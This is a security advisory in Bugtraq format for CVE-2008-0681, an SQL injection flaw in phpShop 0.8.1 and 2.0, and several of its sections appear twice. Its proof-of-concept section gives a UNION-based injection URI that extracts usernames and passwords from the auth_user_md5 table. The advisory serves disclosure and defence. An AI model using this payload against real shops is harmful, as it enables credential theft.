phpShop 'index.php' SQL Injection Vulnerability
BID:27570
Info
phpShop 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 27570 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-0681 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 02 2008 12:00AM |
| Updated: | May 07 2015 05:33PM |
| Credit: | The redc0ders discovered this vulnerability. |
| Vulnerable: |
phpShop phpShop 0.8.1 phpShop phpShop 2.0 |
| Not Vulnerable: | |
Discussion
phpShop 'index.php' SQL Injection Vulnerability
phpShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpShop 0.8.1 and 2.0 are vulnerable; other versions may also be affected.
phpShop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpShop 0.8.1 and 2.0 are vulnerable; other versions may also be affected.
Exploit / POC
phpShop 'index.php' SQL Injection Vulnerability
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/phpshop/?page=shop/flypage&product_id=-3'+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username/**/from/**/auth_user_md5/*
An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/phpshop/?page=shop/flypage&product_id=-3'+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username/**/from/**/auth_user_md5/*
Solution / Fix
phpShop 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phpShop 'index.php' SQL Injection Vulnerability
References:
References: